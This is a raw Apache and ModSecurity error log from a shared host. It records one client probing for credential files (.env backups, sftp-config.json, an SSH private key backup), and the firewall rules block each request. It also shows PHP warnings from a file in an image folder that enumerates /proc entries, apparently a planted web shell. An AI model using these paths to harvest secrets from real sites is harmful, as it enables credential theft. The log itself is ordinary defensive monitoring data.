[Mon May 11 11:35:01.760166 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:47448] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env.bak.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/srv/.env.bak.old"] [unique_id "agGixb4KNmD_mZ_vlf8zLQAAAEg"]
[Mon May 11 11:35:01.761205 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:47448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/srv/.env.bak.old"] [unique_id "agGixb4KNmD_mZ_vlf8zLQAAAEg"]
[Mon May 11 11:35:04.118388 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:47448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGixb4KNmD_mZ_vlf8zLQAAAEg"]
[Mon May 11 11:35:04.144855 2026] [security2:error] [pid 1254133:tid 1254152] [client 185.177.72.9:13728] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env.bak.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env.bak.old"] [unique_id "agGiyBjZymfuKpjWXeh3IwAAANA"]
[Mon May 11 11:35:04.145182 2026] [security2:error] [pid 1254133:tid 1254152] [client 185.177.72.9:13728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env.bak.old"] [unique_id "agGiyBjZymfuKpjWXeh3IwAAANA"]
[Mon May 11 11:35:06.147753 2026] [security2:error] [pid 1254133:tid 1254152] [client 185.177.72.9:13728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiyBjZymfuKpjWXeh3IwAAANA"]
[Mon May 11 11:35:06.175141 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env.production.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/srv/.env.production.temp"] [unique_id "agGiyhjZymfuKpjWXeh3JAAAAM4"]
[Mon May 11 11:35:06.175373 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/srv/.env.production.temp"] [unique_id "agGiyhjZymfuKpjWXeh3JAAAAM4"]
[Mon May 11 11:35:07.936417 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:13730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiyhjZymfuKpjWXeh3JAAAAM4"]
[Mon May 11 11:35:07.963850 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:13738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env.production.temp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env.production.temp"] [unique_id "agGiy0Rdw2n9wv6Ai48CJQAAAIQ"]
[Mon May 11 11:35:07.964190 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:13738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env.production.temp"] [unique_id "agGiy0Rdw2n9wv6Ai48CJQAAAIQ"]
[Mon May 11 11:35:09.218275 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:13738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGiy0Rdw2n9wv6Ai48CJQAAAIQ"]
[Mon May 11 11:35:13.321139 2026] [security2:error] [pid 1254179:tid 1254188] [client 170.106.35.137:33184] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGi0WS6k_SCYd1AVZqpKQAAAQc"]
PHP Warning:  filesize(): stat failed for /proc/330/task/330/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/330/task/330/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/330/task/330/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/330/task/330/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/330/task/330/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/330/task/330/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 11:35:18.831894 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:11774] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /srv/sftp-config.json_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/srv/sftp-config.json_old"] [unique_id "agGi1hjZymfuKpjWXeh3PAAAANM"]
[Mon May 11 11:35:18.832216 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:11774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/srv/sftp-config.json_old"] [unique_id "agGi1hjZymfuKpjWXeh3PAAAANM"]
[Mon May 11 11:35:19.988641 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:11774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi1hjZymfuKpjWXeh3PAAAANM"]
[Mon May 11 11:35:20.015584 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:11776] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /srv/sftp-config.json_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/srv/sftp-config.json_old"] [unique_id "agGi2ERdw2n9wv6Ai48COQAAAIc"]
[Mon May 11 11:35:20.015988 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:11776] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/srv/sftp-config.json_old"] [unique_id "agGi2ERdw2n9wv6Ai48COQAAAIc"]
[Mon May 11 11:35:21.227971 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:11776] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi2ERdw2n9wv6Ai48COQAAAIc"]
[Mon May 11 11:35:21.929886 2026] [authz_core:error] [pid 1254242:tid 1254258] [client 88.88.156.124:60594] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 11:35:23.451624 2026] [authz_core:error] [pid 1254242:tid 1254258] [client 88.88.156.124:60594] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 11:35:23.713409 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:60912] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/ssh/id_rsa.bak"] [unique_id "agGi20Rdw2n9wv6Ai48CPAAAAIA"]
[Mon May 11 11:35:23.714191 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:60912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/ssh/id_rsa.bak"] [unique_id "agGi20Rdw2n9wv6Ai48CPAAAAIA"]
[Mon May 11 11:35:24.676080 2026] [ssl:error] [pid 1256241:tid 1256268] (EAI 2)Name or service not known: [client 34.212.157.110:9891] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:24.676134 2026] [ssl:error] [pid 1256241:tid 1256268] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:24.886504 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:60912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi20Rdw2n9wv6Ai48CPAAAAIA"]
[Mon May 11 11:35:24.913326 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:60920] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/ssh/id_rsa.bak"] [unique_id "agGi3ERdw2n9wv6Ai48CPQAAAIs"]
[Mon May 11 11:35:24.913949 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:60920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/ssh/id_rsa.bak"] [unique_id "agGi3ERdw2n9wv6Ai48CPQAAAIs"]
[Mon May 11 11:35:24.979141 2026] [authz_core:error] [pid 1254242:tid 1254258] [client 88.88.156.124:60594] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 11:35:25.177026 2026] [ssl:error] [pid 1254242:tid 1254251] (EAI 2)Name or service not known: [client 34.212.157.110:43524] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:25.177066 2026] [ssl:error] [pid 1254242:tid 1254251] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:26.333688 2026] [ssl:error] [pid 1254179:tid 1254183] (EAI 2)Name or service not known: [client 35.90.11.59:18301] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:26.333723 2026] [ssl:error] [pid 1254179:tid 1254183] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:26.498818 2026] [authz_core:error] [pid 1254242:tid 1254258] [client 88.88.156.124:60594] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 11:35:26.820623 2026] [ssl:error] [pid 1254212:tid 1254227] (EAI 2)Name or service not known: [client 35.90.11.59:44222] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:26.820666 2026] [ssl:error] [pid 1254212:tid 1254227] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:27.152397 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:60920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi3ERdw2n9wv6Ai48CPQAAAIs"]
[Mon May 11 11:35:27.333672 2026] [ssl:error] [pid 1254328:tid 1254345] (EAI 2)Name or service not known: [client 54.185.93.236:59512] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:27.333704 2026] [ssl:error] [pid 1254328:tid 1254345] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:27.827477 2026] [ssl:error] [pid 1256241:tid 1256250] (EAI 2)Name or service not known: [client 54.185.93.236:33109] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:35:27.827523 2026] [ssl:error] [pid 1256241:tid 1256250] AH01941: stapling_renew_response: responder error
[Mon May 11 11:35:29.612129 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:60948] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.development.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/staging/.env.development.backup"] [unique_id "agGi4WS6k_SCYd1AVZqpPAAAAQE"]
[Mon May 11 11:35:29.612355 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:60948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/staging/.env.development.backup"] [unique_id "agGi4WS6k_SCYd1AVZqpPAAAAQE"]
[Mon May 11 11:35:30.803170 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:60948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi4WS6k_SCYd1AVZqpPAAAAQE"]
[Mon May 11 11:35:30.828929 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:60950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.development.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.development.backup"] [unique_id "agGi4kRdw2n9wv6Ai48CQQAAAIo"]
[Mon May 11 11:35:30.829283 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:60950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.development.backup"] [unique_id "agGi4kRdw2n9wv6Ai48CQQAAAIo"]
[Mon May 11 11:35:32.074065 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:60950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGi4kRdw2n9wv6Ai48CQQAAAIo"]
[Mon May 11 11:35:32.100511 2026] [security2:error] [pid 1256241:tid 1256247] [client 185.177.72.9:60956] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.dist_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/staging/.env.dist_backup"] [unique_id "agGi5JkIEwRJMyDaV55JDAAAAUE"]
